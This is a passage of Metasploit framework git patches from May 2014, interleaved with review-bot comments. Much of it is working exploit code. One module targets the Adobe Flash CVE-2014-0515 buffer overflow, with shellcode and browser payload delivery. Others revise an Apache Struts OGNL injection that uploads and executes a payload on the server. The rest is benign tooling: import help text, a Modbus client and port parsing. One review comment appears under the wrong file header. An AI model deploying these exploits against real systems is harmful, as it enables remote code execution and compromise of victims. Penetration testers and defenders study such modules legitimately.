z2p^yIZTL7@<{_Nc)e;Y$SHiR>v@9>fQFzOFax{Eg!#ltgh0DUZw)6Y^ zv|kkaRrUj?I!AX^5!)X}eBBS74)2L2e}2b!&RKpgeqX8kw|YEVkCAmf^M3FoKid!g KEC1!cC_e!DVj0E& literal 0 HcmV?d00001 
diff --git a/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb b/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb index ff8a3f4549..2d116975a8 100644 --- a/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb +++ b/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb @@ -93,7 +93,6 @@ class Metasploit3 < Msf::Exploit::Remote tag = retrieve_tag(cli, request) profile = get_profile(tag) profile[:tried] = false unless profile.nil? # to allow request the swf - print_status("showme the money") send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) end diff --git a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb new file mode 100644 index 0000000000..6b05ab51e3 --- /dev/null +++ b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb 
@@ -0,0 +1,129 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::BrowserExploitServer + + def initialize(info={}) + super(update_info(info, + 'Name' => "Adobe Flash Player Shader Buffer Overflow", + 'Description' => %q{ + This module exploits a buffer overflow vulnerability in Adobe Flash Player. The + vulnerability occurs in the flash.Display.Shader class, when setting specially + crafted data as its bytecode, as exploited in the wild in April 2014. This module + has been tested successfully on IE 6 to IE 10 with Flash 11 and Flash 12 over + Windows XP SP3, Windows 7 SP1 and Windows 8. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Unknown', # Vulnerability discovery and exploit in the wild + 'juan vazquez' # msf module + ], + 'References' => + [ + ['CVE', '2014-0515'], + ['BID', '67092'], + ['URL', 'http://helpx.adobe.com/security/products/flash-player/apsb14-13.html'], + ['URL', 'http://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks'], + ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2014-0515-the-recent-flash-zero-day/' ] + ], + 'Payload' => + { + 'Space' => 2000, + 'DisableNops' => true, + 'PrependEncoder' => stack_adjust + }, + 'DefaultOptions' => + { + 'InitialAutoRunScript' => 'migrate -f', + 'Retries' => false, + 'EXITFUNC' => "thread" + }, + 'Platform' => 'win', + 'BrowserRequirements' => + { + :source => /script|headers/i, + :clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", + :method => "LoadMovie", + :os_name => Msf::OperatingSystems::WINDOWS, + :ua_name => Msf::HttpClients::IE, + :flash => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ } + }, + 'Targets' => + [ + [ 'Automatic', {} ] + ], + 'Privileged' => false, + 'DisclosureDate' => "Apr 28 
2014", + 'DefaultTarget' => 0)) + end + + def exploit + @swf = create_swf + super + end + + def stack_adjust + adjust = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb + adjust << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit + adjust << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit + adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset + + adjust + end + + def on_request_exploit(cli, request, target_info) + print_status("Request: #{request.uri}") + + if request.uri =~ /\.swf$/ + print_status("Sending SWF...") + send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'}) + return + end + + print_status("Sending HTML...") + tag = retrieve_tag(cli, request) + profile = get_profile(tag) + profile[:tried] = false unless profile.nil? # to allow request the swf + send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) + end + + def exploit_template(cli, target_info) + swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" + flash_payload = "" + get_payload(cli,target_info).unpack("V*").each do |i| + flash_payload << "0x#{i.to_s(16)}," + end + flash_payload.gsub!(/,$/, "") + + + html_template = %Q| + + + + + + + + + + | + + return html_template, binding() + end + + def create_swf + path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2014-0515", "Graph.swf" ) + swf = ::File.open(path, 'rb') { |f| swf = f.read } + + swf + end + +end From 6b41a4e2d981970f943ac38086b69c76df6afd44 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 7 May 2014 17:39:22 -0500 Subject: [PATCH 257/853] Test Flash 13.0.0.182 --- .../exploits/windows/browser/adobe_flash_pixel_bender_bof.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb index 6b05ab51e3..43997895ef 100644 
--- a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb
+++ b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb
@@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote
 :method => "LoadMovie",
 :os_name => Msf::OperatingSystems::WINDOWS,
 :ua_name => Msf::HttpClients::IE,
- :flash => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ }
+ :flash => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') }
 },
 'Targets' =>
 [
From 7da6a2c84cf3f804dacd59d260bad43308b3be1d Mon Sep 17 00:00:00 2001
From: William Vu
Date: Thu, 8 May 2014 02:26:51 -0500
Subject: [PATCH 258/853] Update db_import help with authoritative formats Taken from import_filetype_detect in lib/msf/core/db.rb. [SeeRM #8799]
---
 lib/msf/ui/console/command_dispatcher/db.rb | 24 +++++++++++++++------
 1 file changed, 18 insertions(+), 6 deletions(-)
diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb
index bf3f39eb3d..e16c68ac1a 100644
--- a/lib/msf/ui/console/command_dispatcher/db.rb
+++ b/lib/msf/ui/console/command_dispatcher/db.rb
@@ -1304,26 +1304,38 @@ class Db
 print_line
 print_line "Filenames can be globs like *.xml, or **/*.xml which will search recursively"
 print_line "Currently supported file types include:"
- print_line " Acunetix XML"
+ print_line " Acunetix"
 print_line " Amap Log"
 print_line " Amap Log -m"
- print_line " Appscan XML"
+ print_line " Appscan"
 print_line " Burp Session XML"
- print_line " Foundstone XML"
+ print_line " CI"
+ print_line " Foundstone"
+ print_line " FusionVM XML"
+ print_line " IP Address List"
 print_line " IP360 ASPL"
 print_line " IP360 XML v3"
+ print_line " Libpcap Packet Capture"
+ print_line " Metasploit PWDump Export"
+ print_line " Metasploit XML"
+ print_line " Metasploit Zip Export"
 print_line " Microsoft Baseline Security Analyzer"
- print_line " Nessus NBE"
- print_line " Nessus XML (v1 and v2)"
- print_line " NetSparker XML"
 print_line " NeXpose Simple XML"
 print_line " NeXpose XML Report"
+ print_line " Nessus NBE Report"
+ print_line " Nessus XML (v1)"
+ print_line " Nessus XML (v2)"
+ print_line " NetSparker XML"
+ print_line " Nikto XML"
 print_line " Nmap XML"
 print_line " OpenVAS Report"
+ print_line " OpenVAS XML"
 print_line " Outpost24 XML"
 print_line " Qualys Asset XML"
 print_line " Qualys Scan XML"
 print_line " Retina XML"
+ print_line " Spiceworks CSV Export"
+ print_line " Wapiti XML"
 print_line
 end
From b50b3820a0b3e5832b9c9aae2961009e32b1d133 Mon Sep 17 00:00:00 2001
From: William Vu
Date: Thu, 8 May 2014 02:53:02 -0500
Subject: [PATCH 259/853] Update core/db.rb comments 'n' stuff
---
 lib/msf/core/db.rb | 39 ++++++++++++++++++++++++++++++++++-----
 1 file changed, 34 insertions(+), 5 deletions(-)
diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb
index da187491fd..a81cf2b55d 100644
--- a/lib/msf/core/db.rb
+++ b/lib/msf/core/db.rb
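Review bot: The format list printed here is a hand-maintained copy of what `import_filetype_detect` in lib/msf/core/db.rb recognises, and nothing in the hunk ties the two together, so the help text can go stale again the next time a format is added. The same list is also spelled out in the comment above `import_filetype_detect` and in the db_spec expectation later in this series. A short comment above the first entry, for example `# Keep in sync with import_filetype_detect in lib/msf/core/db.rb and db_spec.rb`, would point the next editor at the other copies. The enclosing method starts outside the hunk.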
@@ -2943,10 +2943,39 @@ class DBManager
 self.send "import_#{ftype}".to_sym, args, &block
 end
- # Returns one of: :nexpose_simplexml :nexpose_rawxml :nmap_xml :openvas_xml
- # :nessus_xml :nessus_xml_v2 :qualys_scan_xml, :qualys_asset_xml, :msf_xml :nessus_nbe :amap_mlog
- # :amap_log :ip_list, :msf_zip, :libpcap, :foundstone_xml, :acunetix_xml, :appscan_xml
- # :burp_session, :ip360_xml_v3, :ip360_aspl_xml, :nikto_xml, :outpost24_xml
+ # Returns one of the following:
+ #
+ # :acunetix_xml
+ # :amap_log
+ # :amap_mlog
+ # :appscan_xml
+ # :burp_session_xml
+ # :ci_xml
+ # :foundstone_xml
+ # :fusionvm_xml
+ # :ip360_aspl_xml
+ # :ip360_xml_v3
+ # :ip_list
+ # :mbsa_xml
+ # :msf_pwdump
+ # :msf_xml
+ # :nessus_nbe
+ # :nessus_xml
+ # :nessus_xml_v2
+ # :netsparker_xml
+ # :nexpose_rawxml
+ # :nexpose_simplexml
+ # :nikto_xml
+ # :nmap_xml
+ # :openvas_new_xml
+ # :openvas_xml
+ # :outpost24_xml
+ # :qualys_asset_xml
+ # :qualys_scan_xml
+ # :retina_xml
+ # :spiceworks_csv
+ # :wapiti_xml
+ #
 # If there is no match, an error is raised instead.
 def import_filetype_detect(data)
@@ -3114,7 +3143,7 @@ class DBManager
 return :netsparker_xml
 elsif (firstline.index("# Metasploit PWDump Export")) # then it's a Metasploit PWDump export
- @import_filedata[:type] = "msf_pwdump"
+ @import_filedata[:type] = "Metasploit PWDump Export"
 return :msf_pwdump
 end
From 102eb8527736dbf3205c4e12c1a356acc3713435 Mon Sep 17 00:00:00 2001
From: William Vu
Date: Thu, 8 May 2014 03:05:49 -0500
Subject: [PATCH 260/853] Update CommandDispatcher::Db spec
---
 spec/lib/msf/ui/command_dispatcher/db_spec.rb | 26 ++++++++++++++-----
 1 file changed, 19 insertions(+), 7 deletions(-)
diff --git a/spec/lib/msf/ui/command_dispatcher/db_spec.rb b/spec/lib/msf/ui/command_dispatcher/db_spec.rb
index 5b058d4fb3..52baca5d93 100644
--- a/spec/lib/msf/ui/command_dispatcher/db_spec.rb
+++ b/spec/lib/msf/ui/command_dispatcher/db_spec.rb
@@ -221,26 +221,38 @@ describe Msf::Ui::Console::CommandDispatcher::Db do
 "Usage: db_import [file2...]",
 "Filenames can be globs like *.xml, or **/*.xml which will search recursively",
 "Currently supported file types include:",
- " Acunetix XML",
+ " Acunetix",
 " Amap Log",
 " Amap Log -m",
- " Appscan XML",
+ " Appscan",
 " Burp Session XML",
- " Foundstone XML",
+ " CI",
+ " Foundstone",
+ " FusionVM XML",
+ " IP Address List",
 " IP360 ASPL",
 " IP360 XML v3",
+ " Libpcap Packet Capture",
+ " Metasploit PWDump Export",
+ " Metasploit XML",
+ " Metasploit Zip Export",
 " Microsoft Baseline Security Analyzer",
- " Nessus NBE",
- " Nessus XML (v1 and v2)",
- " NetSparker XML",
 " NeXpose Simple XML",
 " NeXpose XML Report",
+ " Nessus NBE Report",
+ " Nessus XML (v1)",
+ " Nessus XML (v2)",
+ " NetSparker XML",
+ " Nikto XML",
 " Nmap XML",
 " OpenVAS Report",
+ " OpenVAS XML",
 " Outpost24 XML",
 " Qualys Asset XML",
 " Qualys Scan XML",
- " Retina XML"
+ " Retina XML",
+ " Spiceworks CSV Export",
+ " Wapiti XML"
 ]
 end
 end
From 281b0008056d57f5b5e4c9f295ada1da13311c92 Mon Sep 17 00:00:00 2001
From: Tod Beardsley
Date: Thu, 8 May 2014 10:18:19 -0500
Subject: [PATCH 261/853] Typo fix for #3339
---
 lib/msf/ui/console/command_dispatcher/core.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb
index d59f853289..89fbc0d903 100644
--- a/lib/msf/ui/console/command_dispatcher/core.rb
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
@@ -395,7 +395,7 @@ class Core
 "Taking notes in notepad? Have Metasploit Pro track & report\nyour progress and findings -- learn more on http://rapid7.com/metasploit",
 "Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro\nLearn more on http://rapid7.com/metasploit",
 "Love leveraging credentials? Check out bruteforcing\nin Metasploit Pro -- learn more on http://rapid7.com/metasploit",
- "Save 45% of your time on large engagements with Metaspsloit Pro\nLearn more on http://rapid7.com/metasploit",
+ "Save 45% of your time on large engagements with Metasploit Pro\nLearn more on http://rapid7.com/metasploit",
 "Validate lots of vulnerabilities to demonstrate exposure\nwith Metasploit Pro -- Learn more on http://rapid7.com/metasploit"
 ]
 banner << content.sample # Ruby 1.9-ism!
From ee303aa34ee2a8ac5b70da7a25eaf0dbef57ddf6 Mon Sep 17 00:00:00 2001
From: William Vu
Date: Thu, 8 May 2014 10:26:49 -0500
Subject: [PATCH 262/853] Add missing formats in lib/msf/core/db.rb comment Found outside big if block. Ugh.
---
 lib/msf/core/db.rb | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb
index a81cf2b55d..33db0e6a54 100644
--- a/lib/msf/core/db.rb
+++ b/lib/msf/core/db.rb
@@ -2956,9 +2956,11 @@ class DBManager
 # :ip360_aspl_xml
 # :ip360_xml_v3
 # :ip_list
+ # :libpcap
 # :mbsa_xml
 # :msf_pwdump
 # :msf_xml
+ # :msf_zip
 # :nessus_nbe
 # :nessus_xml
 # :nessus_xml_v2
From 25f13eac3781190f5c20f7002240f73ca94dc8f8 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Thu, 8 May 2014 10:44:53 -0500
Subject: [PATCH 263/853] Clean a little response parsing
---
 .../auxiliary/scanner/scada/modbusclient.rb | 39 +++++++++++--------
 1 file changed, 23 insertions(+), 16 deletions(-)
diff --git a/modules/auxiliary/scanner/scada/modbusclient.rb b/modules/auxiliary/scanner/scada/modbusclient.rb
index b6f83c835c..7fd40ddcee 100644
--- a/modules/auxiliary/scanner/scada/modbusclient.rb
+++ b/modules/auxiliary/scanner/scada/modbusclient.rb
@@ -28,8 +28,9 @@ class Metasploit3 < Msf::Auxiliary
 ['READ_COIL', { 'Description' => 'Read one bit from a coil' } ],
 ['WRITE_COIL', { 'Description' => 'Write one bit to a coil' } ],
 ['READ_REGISTER', { 'Description' => 'Read one word from a register' } ],
- ['WRITE_REGISTER', { 'Description' => 'Write one word to a register' } ],
- ]
+ ['WRITE_REGISTER', { 'Description' => 'Write one word to a register' } ]
+ ],
+ 'DefaultAction' => 'READ_REGISTER'
 ))
 register_options(
@@ -112,16 +113,19 @@ class Metasploit3 < Msf::Auxiliary
 end
 def read_coil
- @function_code = 1
+ @function_code = 0x1
 print_status("Sending READ COIL...")
 response = send_frame(make_read_payload)
 if response.nil?
 print_error("No answer for the READ COIL")
 return
- elsif response.unpack("C*")[-2] == 129
+ elsif response.unpack("C*")[7] == (0x80 | @function_code)
 handle_error(response)
+ elsif response.unpack("C*")[7] == @function_code
+ value = response[9].unpack("c")[0]
+ print_good("Coil value at address #{datastore['DATA_ADDRESS']} : #{value}")
 else
- print_good("Coil value at address #{datastore['DATA_ADDRESS']} : " + response.reverse.unpack("c").to_s.gsub('[', '').gsub(']', ''))
+ print_error("Unknown answer")
 end
 end
@@ -131,12 +135,13 @@ class Metasploit3 < Msf::Auxiliary
 response = send_frame(make_read_payload)
 if response.nil?
 print_error("No answer for the READ REGISTER")
- return
- elsif response.unpack("C*")[-2] == 131
+ elsif response.unpack("C*")[7] == (0x80 | @function_code)
 handle_error(response)
+ elsif response.unpack("C*")[7] == @function_code
+ value = response[9..10].unpack("n")[0]
+ print_good("Register value at address #{datastore['DATA_ADDRESS']} : #{value}")
 else
- value = response.split[0][9..10].to_s.unpack("n").to_s.gsub('[', '').gsub(']','')
- print_good("Register value at address #{datastore['DATA_ADDRESS']} : " + value)
+ print_error("Unknown answer")
 end
 end
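Review bot: In the read_coil hunk the new success branch reads `response[9]` after checking only byte 7, so a reply that carries the expected function code but is shorter than ten bytes leaves `response[9]` nil and the `.unpack("c")` call raises NoMethodError instead of reporting a bad answer. The read_register hunk has the same gap with `response[9..10]`, which needs eleven bytes. Folding a length test into the branch, e.g. `elsif response.length >= 10 && response.unpack("C*")[7] == @function_code`, lets truncated or malformed replies fall through to the existing `print_error("Unknown answer")`. Both method bodies start outside their hunks.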
@@ -154,11 +159,12 @@ class Metasploit3 < Msf::Auxiliary
 response = send_frame(make_write_coil_payload(data))
 if response.nil?
 print_error("No answer for the WRITE COIL")
- return
- elsif response.unpack("C*")[-2] == 133
+ elsif response.unpack("C*")[7] == (0x80 | @function_code)
 handle_error(response)
- else
+ elsif response.unpack("C*")[7] == @function_code
 print_good("Value #{datastore['DATA']} successfully written at coil address #{datastore['DATA_ADDRESS']}")
+ else
+ print_error("Unknown answer")
 end
 end
@@ -172,18 +178,19 @@ class Metasploit3 < Msf::Auxiliary
 response = send_frame(make_write_register_payload(datastore['DATA']))
 if response.nil?
 print_error("No answer for the WRITE REGISTER")
- return
- elsif response.unpack("C*")[-2] == 134
+ elsif response.unpack("C*")[7] == (0x80 | @function_code)
 handle_error(response)
- else
+ elsif response.unpack("C*")[7] == @function_code
 print_good("Value #{datastore['DATA']} successfully written at registry address #{datastore['DATA_ADDRESS']}")
+ else
+ print_error("Unknown answer")
 end
 end
 def run
 @modbus_counter = 0x0000 # used for modbus frames
 connect
- case datastore['ACTION']
+ case action.name
 when "READ_COIL"
 read_coil
 when "READ_REGISTER"
From 66252ba9e52c4855e800f6aaa650cafd552bdf27 Mon Sep 17 00:00:00 2001
From: Lutz Wolf
Date: Thu, 8 May 2014 21:35:35 +0200
Subject: [PATCH 264/853] support negation in portspec
---
 lib/rex/socket.rb | 26 ++++++++++++++++++++++----
 1 file changed, 22 insertions(+), 4 deletions(-)
diff --git a/lib/rex/socket.rb b/lib/rex/socket.rb
index e68a0263a6..ba510c5a80 100644
--- a/lib/rex/socket.rb
+++ b/lib/rex/socket.rb
@@ -505,14 +505,24 @@ module Socket
 end
 #
- # Converts a port specification like "80,21-23,443" into a sorted,
- # unique array of valid port numbers like [21,22,23,80,443]
+ # Converts a port specification like "80,21-25,!24,443" into a sorted,
+ # unique array of valid port numbers like [21,22,23,25,80,443]
 #
 def self.portspec_to_portlist(pspec)
 ports = []
+ remove = []
 # Build ports array from port specification
 pspec.split(/,/).each do |item|
+ item.strip!
+
+ if item.starts_with? '!' then
+ negate = true
+ item.delete! '!'
+ else
+ negate = false
+ end
+
 start, stop = item.split(/-/).map { |p| p.to_i }
 start ||= 0
@@ -520,11 +530,19 @@ module Socket
 start, stop = stop, start if stop < start
- start.upto(stop) { |p| ports << p }
+ if negate then
+ start.upto(stop) { |p| remove << p }
+ else
+ start.upto(stop) { |p| ports << p }
+ end
+ end
+
+ if ports.empty? and not remove.empty? then
+ ports = 1.upto 65535
 end
 # Sort, and remove dups and invalid ports
- ports.sort.uniq.delete_if { |p| p < 1 or p > 65535 }
+ ports.sort.uniq.delete_if { |p| p < 1 or p > 65535 or remove.include? p }
 end
 #
From e7b7af2f750af3b62ed31dbe5d5b8d04d1571f30 Mon Sep 17 00:00:00 2001
From: Christian Mehlmauer
Date: Thu, 8 May 2014 22:15:52 +0200
Subject: [PATCH 265/853] fixed apache struts module
---
 .../multi/http/struts_code_exec_parameters.rb | 21 ++++++++++---------
 1 file changed, 11 insertions(+), 10 deletions(-)
diff --git a/modules/exploits/multi/http/struts_code_exec_parameters.rb b/modules/exploits/multi/http/struts_code_exec_parameters.rb
index 1db90c817f..c693825cbc 100644
--- a/modules/exploits/multi/http/struts_code_exec_parameters.rb
+++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb
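Review bot: `item.starts_with? '!'` in the first hunk relies on ActiveSupport's alias; core Ruby's String only defines `start_with?`, so if lib/rex/socket.rb is ever loaded without ActiveSupport this line raises NoMethodError for every port specification. `if item.start_with?('!')` behaves the same and has no such dependency. Note also that `item.delete! '!'` strips every exclamation mark in the item rather than only the leading one; `item = item[1..-1]` would limit it to the prefix. portspec_to_portlist ends outside this hunk.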
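Review bot: In the second hunk `remove.include? p` runs a linear scan of `remove` for each candidate port inside `delete_if`, so a spec such as `!1-1024` against the full default range costs tens of millions of comparisons. `ports = 1.upto 65535` also leaves `ports` an Enumerator rather than an Array, which only works because `sort` is the next call made on it. Using `ports = (1..65535).to_a` and `(ports - remove).sort.uniq.delete_if { |p| p < 1 or p > 65535 }` gives the same result with a hash-based difference. The method body starts outside the hunk.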
@@ -67,25 +67,26 @@ class Metasploit3 < Msf::Exploit::Remote [ Opt::RPORT(8080), OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.',"username"]), - OptString.new('TARGETURI', [ true, 'The path to a struts application action with the location to perform the injection', "/blank-struts2/login.action?INJECT"]), + OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/blank-struts2/login.action"]), OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]) ], self.class) end - def execute_command(cmd, opts = {}) - inject = "PARAMETERTOKEN=(#context[\"xwork.MethodAccessor.denyMethodExecution\"]=+new+java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]" - inject << "=+new+java.lang.Boolean(true),CMD)('meh')&z[(PARAMETERTOKEN)(meh)]=true" - inject.gsub!(/PARAMETERTOKEN/,Rex::Text::uri_encode(datastore['PARAMETER'])) - inject.gsub!(/CMD/,Rex::Text::uri_encode(cmd)) - uri = String.new(datastore['TARGETURI']) - uri = normalize_uri(uri) - uri.gsub!(/INJECT/,inject) # append the injection string + def parameter + datastore['PARAMETER'] + end + + def execute_command(cmd) + inject = "(#context[\"xwork.MethodAccessor.denyMethodExecution\"]= new java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]" + inject << "= new java.lang.Boolean(true),#{cmd})('meh')" + uri = normalize_uri(datastore['TARGETURI']) resp = send_request_cgi({ 'uri' => uri, 'version' => '1.1', 'method' => 'GET', + 'vars_get' => { parameter => inject, "z[(#{parameter})(meh)]" => 'true' } }) - return resp #Used for check function. + return resp end def exploit From a3fff5401f43f21a5491c426a2f2ca154874ad0c Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Thu, 8 May 2014 23:05:41 +0200 Subject: [PATCH 266/853] more code cleanup --- .../multi/http/struts_code_exec_parameters.rb | 42 +++++++++---------- 1 file changed, 21 insertions(+), 21 deletions(-) 
diff --git a/modules/exploits/multi/http/struts_code_exec_parameters.rb b/modules/exploits/multi/http/struts_code_exec_parameters.rb index c693825cbc..d7fcb49034 100644 --- a/modules/exploits/multi/http/struts_code_exec_parameters.rb +++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb @@ -27,7 +27,8 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Meder Kydyraliev', # Vulnerability Discovery and PoC 'Richard Hicks ', # Metasploit Module - 'mihi' #ARCH_JAVA support + 'mihi', #ARCH_JAVA support + 'Christian Mehlmauer' # Metasploit Module ], 'License' => MSF_LICENSE, 'References' => @@ -66,8 +67,8 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ Opt::RPORT(8080), - OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.',"username"]), - OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/blank-struts2/login.action"]), + OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.','username']), + OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/blank-struts2/login.action']), OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]) ], self.class) end 
@@ -86,56 +87,56 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'GET', 'vars_get' => { parameter => inject, "z[(#{parameter})(meh)]" => 'true' } }) - return resp + resp end def exploit #Set up generic values. - @payload_exe = rand_text_alphanumeric(4+rand(4)) + payload_exe = rand_text_alphanumeric(4 + rand(4)) pl_exe = generate_payload_exe - append = 'false' + append = false #Now arch specific... case target['Platform'] when 'linux' - @payload_exe = "/tmp/#{@payload_exe}" - chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{@payload_exe}\".split(\"_\"))" - exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_#{@payload_exe}\".split(\"_\"))" + payload_exe = "/tmp/#{payload_exe}" + chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{payload_exe}\".split(\"_\"))" + exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_#{payload_exe}\".split(\"_\"))" when 'java' - @payload_exe << ".jar" + payload_exe << ".jar" pl_exe = payload.encoded_jar.pack - exec_cmd = "" + exec_cmd = '' exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked')," exec_cmd << "#q.setAccessible(true),#q.set(null,true)," exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15')," exec_cmd << "#q.setAccessible(true),#q.set(null,false)," - exec_cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()})," + exec_cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{payload_exe}').toURI().toURL()})," exec_cmd << "#c=#cl.loadClass('metasploit.Payload')," exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(" exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})" when 'windows' - @payload_exe = "./#{@payload_exe}.exe" - exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')" + payload_exe = "./#{payload_exe}.exe" 
+ exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{payload_exe}')" else fail_with(Failure::NoTarget, 'Unsupported target platform!') end #Now with all the arch specific stuff set, perform the upload. #109 = length of command string plus the max length of append. - sub_from_chunk = 109 + @payload_exe.length + datastore['TARGETURI'].length + datastore['PARAMETER'].length + sub_from_chunk = 109 + payload_exe.length + datastore['TARGETURI'].length + parameter.length chunk_length = 2048 - sub_from_chunk - chunk_length = ((chunk_length/4).floor)*3 + chunk_length = ((chunk_length/4).floor) * 3 while pl_exe.length > chunk_length - java_upload_part(pl_exe[0,chunk_length],@payload_exe,append) + java_upload_part(pl_exe[0,chunk_length], payload_exe, append) pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length] append = true end - java_upload_part(pl_exe,@payload_exe,append) + java_upload_part(pl_exe, payload_exe, append) execute_command(chmod_cmd) if target['Platform'] == 'linux' execute_command(exec_cmd) - register_files_for_cleanup(@payload_exe) + register_files_for_cleanup(payload_exe) end - def java_upload_part(part, filename, append = 'false') + def java_upload_part(part, filename, append = false) cmd = "" cmd << "#f=new java.io.FileOutputStream('#{filename}',#{append})," cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}'))," @@ -152,7 +153,6 @@ class Metasploit3 < Msf::Exploit::Remote t2 = Time.now delta = t2 - t1 - if response.nil? return Exploit::CheckCode::Safe elsif delta < sleep_time From 58c46cc73d529238a99bb6ac6f4702a8243d833c Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 8 May 2014 16:48:42 -0500 Subject: [PATCH 267/853] Add compilation instructions for the AS --- external/source/exploits/CVE-2014-0515/Graph.as | 1 + 1 file changed, 1 insertion(+) diff --git a/external/source/exploits/CVE-2014-0515/Graph.as b/external/source/exploits/CVE-2014-0515/Graph.as index 4982447997..ab64eb90cd 100755 
--- a/external/source/exploits/CVE-2014-0515/Graph.as +++ b/external/source/exploits/CVE-2014-0515/Graph.as @@ -1,3 +1,4 @@ +//compile with AIR SDK 13.0: mxmlc Graph.as -o Graph.swf package { import flash.display.Sprite; import flash.utils.ByteArray; From 53fde675e782e9c29648f1baf6529f6239a72463 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Fri, 9 May 2014 10:38:19 +0200 Subject: [PATCH 268/853] randomize meh parameter --- modules/exploits/multi/http/struts_code_exec_parameters.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_parameters.rb b/modules/exploits/multi/http/struts_code_exec_parameters.rb index d7fcb49034..ff29678af5 100644 --- a/modules/exploits/multi/http/struts_code_exec_parameters.rb +++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb @@ -78,14 +78,15 @@ class Metasploit3 < Msf::Exploit::Remote end def execute_command(cmd) + junk = Rex::Text.rand_text_alpha(6) inject = "(#context[\"xwork.MethodAccessor.denyMethodExecution\"]= new java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]" - inject << "= new java.lang.Boolean(true),#{cmd})('meh')" + inject << "= new java.lang.Boolean(true),#{cmd})('#{junk}')" uri = normalize_uri(datastore['TARGETURI']) resp = send_request_cgi({ 'uri' => uri, 'version' => '1.1', 'method' => 'GET', - 'vars_get' => { parameter => inject, "z[(#{parameter})(meh)]" => 'true' } + 'vars_get' => { parameter => inject, "z[(#{parameter})(#{junk})]" => 'true' 